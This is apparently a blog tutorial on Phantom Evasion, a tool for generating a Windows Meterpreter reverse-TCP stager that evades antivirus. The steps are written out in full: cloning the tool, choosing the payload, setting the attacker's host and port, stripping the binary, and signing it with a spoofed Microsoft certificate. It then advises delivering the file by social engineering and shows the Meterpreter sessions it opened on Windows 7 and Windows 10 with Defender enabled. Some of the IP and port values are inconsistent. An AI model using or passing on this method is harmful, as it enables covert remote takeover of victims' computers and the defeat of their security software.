HOW TO EVAD PROTECTION ANTIVIRUS WITH PHANTOM PAYLOADS

Metasploit is the most popular tool used in penetration tests. Metasploit tries to find weaknesses in its local network before hackers do it. Next, we will present the tool most used by attackers to test the security of their operating system.

In Kali Linux, Metasploit is installed by default and includes a large number of payloads that are used to generate malicious executables and hack platforms. But today we will show you a tool called Phantom Evasion that is used to generate executable detection tests using the msfvenom payload. The main objective of Phantom Evasion is to prevent antivirus solutions from detecting payloads.

  • Phantom Evasion has been tested on Kali Linux 2018.4 (amd64)
  • To clone, type git clone https://github.com/oddcod3/Phantom-Evasion.git
  • Write cd Phantom-Evasion Write chmod u + x phantom-evasion.py
  • Type python3 phantom-evasion.py
  • When it is executed for the first time, some error may appear, but the tool will work perfectly

Write 1

[>] Please insert option: 1

Write 2

[+] WINDOWS MODULES INDEX:

[1]  Shellcode Injection

[2]  Stager

[3]  Powershell / Wine-pyinstaller

[0]  Back

[>] Please insert option: 2

Write 1

[+] WINDOWS STAGER MODULES:

[1]  X86 stagers

[2]  X64 stagers

[0]  Back

[>] Please insert option: 1

Write 3

[+] WINDOWS x86 STAGER MODULES:

[1]  C meterpreter/reverse_TCP VirtualAlloc                           (C)

[2]  C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH       (C)

[3]  C meterpreter/reverse_TCP HeapAlloc                              (C)

[4]  C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH          (C)

[5]  C meterpreter/reverse_HTTP VirtualAlloc                          (C)

[6]  C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH      (C)

[7]  C meterpreter/reverse_HTTP HeapAlloc                             (C)

[8]  C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH         (C)

[9]  C meterpreter/reverse_HTTPS VirtualAlloc                         (C)

[10] C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH     (C)

[11] C meterpreter/reverse_HTTPS HeapAlloc                            (C)

[12] C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH        (C)

[0]  Back

After selecting any payload, a description of the load will be displayed and to what extent it will be constructed

[+] MODULE DESCRIPTION:

This Module generate and compile

 32bit pure c meterpreter reverse tcp stagers.

 Require msfconsole multi/handler listener

 with payload set to windows/meterpreter/reverse_tcp

[>] Memory allocation type: HEAP

[>] TYPE: TCP

 [>] STATIC EVASION:

 Polymorphic source code

 [>] DYNAMIC EVASION:

 Resource consumption technique

 Sandbox-aware code

 [>] AUTOCOMPILE(cross platform): to EXE file

Press Enter to continue:

Enter 192.1.1.1 (IP address of the attacker)

[>] Please insert LHOST: 192.1.1.1

Enter 433 (port of the attacker)

[>] Please insert LPORT: 443

Then enter the name of the file: file

[>] Please insert output filename: file

Type n to create a single process on the target computer. Therefore, there will be less and less chance of being caught by the antivirus

[>] Spawn Multiple Processes:

During target-side execution this will cause to spawn a maximum of 4 processes

consequentialy.

Only the last spawned process will reach the malicious section of code

while the other decoy processes spawned before will executes only random junk code

[>] Add multiple processes behaviour?(y/n): n

Write y

[>] Generating C meterpreter stager

[>] Compiling…

[>] Strip

strip is a GNU utility to “strip” symbols from object files.

This is useful for minimizing their file size, streamlining them for distribution.

It can also be useful for making it more difficult to reverse-engineer the compiled code.

(Lower rate of detection)

[>] Strip executable? (y/n): y

The above query will reduce the size of the malicious file

Write y

[>] Sign Executable

Online Certificate spoofer & Executabe signer (Lower rate of detection)

[>] Sign executable? (y/n): y

  • The above query will sign the malicious file with the default certificate that comes with Phantom Evasion
  • You can use your own certificate or use it with the Microsoft certificate that comes with the Phantom Evasion
  • Write y
  • Write 1

Certificates directory is not empty , use already existing certificate? (y/n): y

[1] www.microsoft.com

[2] Create new certificate

[>] Select a Certificate or create a new one: 1

Write 1

[>] Select a Certificate or create a new one: 1

[>] Insert sign software description (default: Notepad Benchmark Util):

[>] Signing file1.exe with osslsigncode…

[>] Succeeded

[<>] File saved in Phantom-Evasion folder

After creating a malicious code, send the file to the target. You can use any social engineering variant to reach your goal

TESTING IN WINDOWS:

  • For tests, we are using Windows 7 (32 bits) with Windows Defender disabled
  • Open the executable file by pressing enter
  • To check the payload you can use the metasploit multiple controller that comes pre-installed on Kali Linux. Open another terminal and type msfconsole
  • Write use multi/handler

msf > use multi/handler

  • Enter LHOST 192.1.1.1 (same as entered in Phantom Evasion)
  • Write LPORT 443 (same as entered in Phantom Evasion)
  • Write show options

msf exploit(multi/handler) > set LHOST 192.1.1.1

LHOST => 192.168.1.6

msf exploit(multi/handler) > set LPORT 443

LPORT => 443

msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name  Current Setting  Required Description

  —-  —————  ——– ———–

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required Description

  —-      —————  ——– ———–

  EXITFUNC  process       yes Exit technique (Accepted: ”, seh, thread, process, none)

  LHOST     192.168.1.6      yes The listen address (an interface may be specified)

  LPORT     443       yes The listen port

Exploit target:

Id  Name

  — —-

  0 Wildcard Target

Write run

msf exploit(multi/handler) > run

  • As malicious it has already started in Windows 7 Professional 32 Bit. After typing, a new session will be created between the attackers and the target machines
  • Enter sysinfo to verify the details of the destination computer

[] Started reverse TCP handler on 192.1.1.1:443 [] Sending stage (179779 bytes) to 192.168.1.9

[*] Meterpreter session 1 opened (192.1.1.1:443 -> 192.1.1.1:49250) at 2019-03-04 00:34:27 -0500

meterpreter > sysinfo

Computer        : WIN-31VSBP3FUQT

OS              : Windows 7 (Build 7601, Service Pack 1).

Architecture    : x86

System Language : en_US

Domain          : WORKGROUP

Logged On Users : 1

Meterpreter     : x86/windows

meterpreter >

  • Now you can manipulate the target using the command shell of meterpreter
  • Now, to perform more tests, we have used Windows 10 Enterprise 1809 (x64) with Windows Defender enabled
  • Open the malicious executable on the Windows 10 machine. As you open the executable file, a new session will be created in multi / handler
  • Enter sysinfo to verify the details of the destination computer

[] Started reverse TCP handler on 192.1.1.1:443 [] Sending stage (179779 bytes) to 192.1.1.1

[*] Meterpreter session 2 opened (192.168.1.6:443 -> 192.1.1.1:49753) at 2019-03-04 02:26:30 -0500

meterpreter > sysinfo

Computer        : DESKTOP-I9LEAU8

OS              : Windows 10 (Build 17758).

Architecture    : x64

System Language : en_US

Domain          : WORKGROUP

Logged On Users : 2

Meterpreter     : x86/windows

Now you can manipulate the objective using the command shell of meterpreter

This tool can be used to generate an initial level payload that can be further customized to prevent other antivirus.